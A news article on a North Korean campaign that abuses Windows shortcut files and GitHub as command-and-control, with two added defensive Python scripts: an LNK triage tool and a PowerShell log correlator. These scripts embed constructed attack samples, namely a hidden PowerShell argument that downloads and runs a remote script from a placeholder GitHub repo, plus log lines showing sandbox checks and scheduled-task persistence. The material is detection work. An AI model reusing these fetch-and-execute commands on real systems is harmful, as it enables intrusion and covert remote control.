North Korean hackers abuse LNKs and GitHub repos in ongoing campaign

DPRK-linked threat actors are favoring stealth over sophistication in targeting South Korean organizations, as researchers report the use of weaponized Windows shortcut (.LNK) files and GitHub-based command-and-control (C2) channels in a new campaign.

According to new Fortinet findings, a series of attacks dating back to 2024 uses a multi-stage scripting process and GitHub C2 to evade detection, with the obfuscation improving in each iteration of the campaign.

“In recent months, the threat actor has altered their tactics,” Fortinet researchers said in a blog post. “They now embed decoding functions within LNK arguments and include encoded payloads directly inside the files.” The ongoing campaign appears aimed at expanding DPRK’s surveillance within South Korea. The researchers noted that the lighter obfuscation and richer metadata in earlier iterations of the campaign allowed them to link it to attacks spreading the XenoRAT malware.

Jason Soroko, senior fellow at Sectigo, believes the strategy aligns with the recent trend of attackers relying on built-in Windows utilities and legitimate services to carry out their objectives. “Modern cyber espionage has fundamentally shifted toward a highly evasive strategy known as living off the land,” he said, noting that attackers are increasingly abusing native tools like PowerShell and scheduled tasks to blend into normal system activity.

LNK files have a long history of abuse, and Microsoft has issued multiple patches and advisories over the years to curb their misuse.

LNK files used as stealth loaders

The infection chain begins with a Windows shortcut file. Shortcuts normally launch applications or open documents, but the target path and command-line arguments stored inside the file can just as easily invoke an interpreter to run an embedded script or a binary.

“A .lnk file is how Windows handles shortcuts: Whenever you click on that Outlook icon on your desktop, you’re actually clicking on a separate file that uses the Outlook image and directs the operating system to open up Microsoft Outlook,” explained Jamie Boote, senior manager, strategic security consulting at Black Duck. “You can also create shortcut links (.lnk files) to websites, programs with additional commands, executable scripts, and just about anything else you could type into Windows’s Run command window.”

The LNK files in the campaign carry various scripts. Earlier versions used simple string concatenation to mask the GitHub C2 address and the access token, the researchers said, and it was easy to determine that the script was meant to run a PowerShell command fetched from GitHub.

Later versions shifted to basic character-decoding functions, making detection a little trickier, but the files still carried telling metadata such as names, sizes, and modification dates that allowed researchers to tie them to the specific campaign. The name field repeatedly reads “Hangul document,” a lure pattern consistent with state-affiliated groups such as Kimsuky, APT37, and Lazarus.

In its latest iteration, the campaign operators have stripped the identifying metadata and now embed only a decoding function within the shortcut’s command-line arguments.
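As an added example (not code from the article and not Fortinet’s tooling), the following Python script parses the shortcut structures discussed above, folds the simple quote-plus-[char] concatenation the researchers describe, and flags a GitHub host or access token that becomes visible only after folding, along with the “Hangul document” name and the write time used for clustering. The shortcut it analyzes, the owner/repository path, and the token are constructed placeholders; the indicator patterns are assumptions about what such arguments look like, not Fortinet’s published IoCs.

```python
"""LNK triage: ShellLinkHeader + StringData per MS-SHLLINK, concatenation folding,
and GitHub indicators. Added example; the sample shortcut below is constructed."""
import re
import struct
from datetime import datetime, timedelta, timezone

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
(HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH,
 HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def from_filetime(ft: int) -> datetime:          # FILETIME: 100 ns ticks since 1601-01-01
    return EPOCH_1601 + timedelta(microseconds=ft // 10)

def to_filetime(dt: datetime) -> int:
    return int((dt - EPOCH_1601).total_seconds()) * 10_000_000

def _string_data(buf, off, unicode):             # CountCharacters (u16) then the chars
    n, = struct.unpack_from("<H", buf, off); off += 2
    if unicode:
        return buf[off:off + 2 * n].decode("utf-16-le"), off + 2 * n
    return buf[off:off + n].decode("cp1252", "replace"), off + n

def parse_lnk(buf: bytes) -> dict:
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link")
    flags, = struct.unpack_from("<I", buf, 20)
    wtime, size = struct.unpack_from("<QI", buf, 44)      # WriteTime, FileSize
    off = 0x4C
    if flags & HAS_IDLIST:                                # skip LinkTargetIDList
        n, = struct.unpack_from("<H", buf, off); off += 2 + n
    if flags & HAS_LINKINFO:                              # skip LinkInfo
        n, = struct.unpack_from("<I", buf, off); off += n
    info = {"flags": flags, "write_time": from_filetime(wtime), "file_size": size}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                     (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):   # fixed StringData order
        if flags & bit:
            info[key], off = _string_data(buf, off, bool(flags & IS_UNICODE))
    return info

# Fold runs like 'raw.gith'+'ub...'+[char]47 into one literal (assumed obfuscation style).
_LIT = r"(?:'[^']*'|\[char\]\s*(?:0x[0-9a-fA-F]+|\d+))"
_RUN = re.compile(_LIT + r"(?:\s*\+\s*" + _LIT + r")+")
_PART = re.compile(r"'([^']*)'|\[char\]\s*0x([0-9a-fA-F]+)|\[char\]\s*(\d+)")

def fold_concats(args: str) -> str:
    def fold(m):
        out = [chr(int(hx, 16)) if hx else chr(int(dec)) if dec else lit
               for lit, hx, dec in _PART.findall(m.group(0))]
        return "'" + "".join(out) + "'"
    return _RUN.sub(fold, args)

# Indicator patterns: assumptions for this example, not published IoCs.
GITHUB_HOST = re.compile(r"\b(?:raw\.githubusercontent\.com|api\.github\.com|gist\.github\.com|github\.com)\b", re.I)
GITHUB_TOKEN = re.compile(r"\b(?:ghp|gho|ghu|ghs|ghr|github_pat)_[A-Za-z0-9_]{20,}")
DECODER = re.compile(r"\[char\]|-join|FromBase64String|-bxor|\.Replace\(|-replace", re.I)
INTERP = re.compile(r"(?:powershell|pwsh|cmd|mshta|wscript|cscript)(?:\.exe)?\b", re.I)

def triage(buf: bytes) -> dict:
    info = parse_lnk(buf)
    args = info.get("arguments", "")
    folded = fold_concats(args)
    target = info.get("relative_path", "") + " " + info.get("working_dir", "")
    findings = []
    if INTERP.search(target) or INTERP.search(args):
        findings.append("interpreter_launch")
    if DECODER.search(args):
        findings.append("decoder_in_arguments")
    if GITHUB_HOST.search(args):
        findings.append("github_in_arguments")
    elif GITHUB_HOST.search(folded):
        findings.append("github_after_folding")        # hidden until concatenation is folded
    if GITHUB_TOKEN.search(folded):
        findings.append("embedded_github_token")
    if "hangul" in info.get("name", "").lower():
        findings.append("hangul_document_lure_name")
    info.update(folded_arguments=folded, findings=findings)
    return info

def build_lnk(name, rel_path, args, written: datetime, size=0x3A2) -> bytes:
    """Constructed shortcut for the demo: no IDList/LinkInfo, Unicode StringData."""
    flags = HAS_NAME | HAS_RELPATH | HAS_ARGS | IS_UNICODE
    hdr = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0,
                      to_filetime(written), size, 0, 7, 0, 0, 0, 0)
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return hdr + sd(name) + sd(rel_path) + sd(args)

SAMPLE_ARGS = (                      # constructed; owner, repo and token are placeholders
    "-w hidden -ep bypass -c \"$t='ghp_'+'0123456789abcdefghijklmnopqrstuvwxyz';"
    "$u='https://raw.gith'+'ubusercontent.com'+[char]47+'example-owner'+'/example-repo/main/s.ps1';"
    "iex (iwr $u -Headers @{Authorization='token '+$t} -UseBasicParsing)\""
)
SAMPLE_LNK = build_lnk("Hangul document",
                       r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       SAMPLE_ARGS, datetime(2025, 1, 15, tzinfo=timezone.utc))

if __name__ == "__main__":
    for k, v in triage(SAMPLE_LNK).items():
        print(f"{k}: {v}")
```

The folding step is deliberately narrow: it only collapses literal-plus-literal runs, so a `[char]` run that is fed through `-join` or XOR (the “decoding functions” in the later iterations) still trips the `decoder_in_arguments` check but is not decoded, which is the point at which a sample should go to a sandbox rather than a regex.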

GitHub as C2

Researchers also highlighted the campaign’s use of GitHub as a C2 layer. Rather than communicating with suspicious-looking or newly registered domains, the malware interacts with GitHub repositories and APIs to receive instructions and exfiltrate data.

“The fact that this shortcut file creates a chain that ultimately reaches out to a GitHub repository, and pulls scripts over the internet, should put network defenders on alert that even productivity platforms can be attack vectors,” Boote added.

After infecting a system, the PowerShell scripts run environment checks to confirm the host isn’t an analysis sandbox, establish persistence across reboots through a scheduled task, and collect detailed system information. Only then do subsequent scripts attempt a stable connection, fetching additional modules and instructions from the attacker’s GitHub repository.
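The ordering just described (anti-analysis checks, scheduled-task persistence, host inventory, then a GitHub fetch) is itself a detectable shape in PowerShell script block logging (event ID 4104). As an added example, not Fortinet’s detection content, the routine below correlates those stages per host inside a time window. The log lines, host names, user names, repository paths and the per-stage patterns are constructed assumptions for this example.

```python
"""Per-host stage correlation over PowerShell 4104 script-block log lines.
Added example with constructed input; stage patterns are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed stage signatures; tune these to the logs actually being collected.
STAGES = {
    "anti_analysis": re.compile(r"Win32_ComputerSystem|Get-Process.*(?:procmon|wireshark|x64dbg)|VirtualBox|VMware|Hyper-V", re.I),
    "persistence":   re.compile(r"Register-ScheduledTask|schtasks(?:\.exe)?\s+/create", re.I),
    "inventory":     re.compile(r"systeminfo|Get-ComputerInfo|Win32_OperatingSystem|ipconfig|whoami", re.I),
    "github_fetch":  re.compile(r"raw\.githubusercontent\.com|api\.github\.com", re.I),
}

# Constructed log format: one 4104 event per line, ScriptBlockText in text="...".
LINE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+id=4104\s+text="(?P<text>.*)"$')

SAMPLE_LOG = """\
2025-03-04T09:12:01Z host=WS-017 user=jlee id=4104 text="if ((Get-WmiObject Win32_ComputerSystem).Manufacturer -match 'VMware|VirtualBox') { exit }"
2025-03-04T09:12:03Z host=WS-017 user=jlee id=4104 text="Register-ScheduledTask -TaskName 'OneDriveUpdate' -Action $a -Trigger $t -Force"
2025-03-04T09:12:05Z host=WS-017 user=jlee id=4104 text="$info = systeminfo; $info += whoami /all"
2025-03-04T09:12:40Z host=WS-017 user=jlee id=4104 text="iex (iwr 'https://raw.githubusercontent.com/example-owner/example-repo/main/m.ps1' -Headers @{Authorization='token '+$t})"
2025-03-04T10:01:10Z host=DEV-02 user=park id=4104 text="iwr https://api.github.com/repos/example-org/tools/releases/latest | ConvertFrom-Json"
2025-03-04T13:30:00Z host=WS-017 user=jlee id=4104 text="Get-ChildItem C:\\Users\\jlee\\Documents"
"""

def parse_lines(log: str):
    for raw in log.splitlines():
        m = LINE.match(raw)
        if not m:
            continue                                   # not a 4104 line in our format
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ev["stages"] = {name for name, rx in STAGES.items() if rx.search(ev["text"])}
        yield ev

def correlate(log: str, window=timedelta(minutes=30), min_stages=3) -> list:
    """Alert when a GitHub fetch on a host is preceded, within `window`, by enough
    of the other staging steps. A lone GitHub fetch (a developer host) is not enough."""
    by_host = defaultdict(list)
    for ev in parse_lines(log):
        by_host[ev["host"]].append(ev)
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["ts"])
        for i, anchor in enumerate(evs):
            if "github_fetch" not in anchor["stages"]:
                continue
            seen = {}                                  # stage -> first time seen in window
            for ev in evs[:i + 1]:
                if anchor["ts"] - ev["ts"] <= window:
                    for s in ev["stages"]:
                        seen.setdefault(s, ev["ts"])
            if len(seen) >= min_stages:
                alerts.append({"host": host, "user": anchor["user"], "github_fetch_at": anchor["ts"],
                               "stages": dict(sorted(seen.items(), key=lambda kv: kv[1]))})
                break                                  # one alert per host is enough here
    return alerts

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(a)
```

Anchoring on the GitHub fetch and looking backwards keeps the rule quiet on hosts where GitHub traffic is normal: DEV-02 in the sample pulls a release manifest but performs none of the staging steps, so it never reaches the threshold, while WS-017 trips all four stages inside a minute.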

The researchers flagged a GitHub account, “motoralis”, with consistent activity dating back to 2025, and other less frequent accounts, including “God0808RAMA,” “Pigresy80,” “entire73,” “pandora0009,” and “brandonleeodd93-blip.”

Additionally, the blog post shared a set of URLs and file hashes as indicators of compromise to support detection efforts.
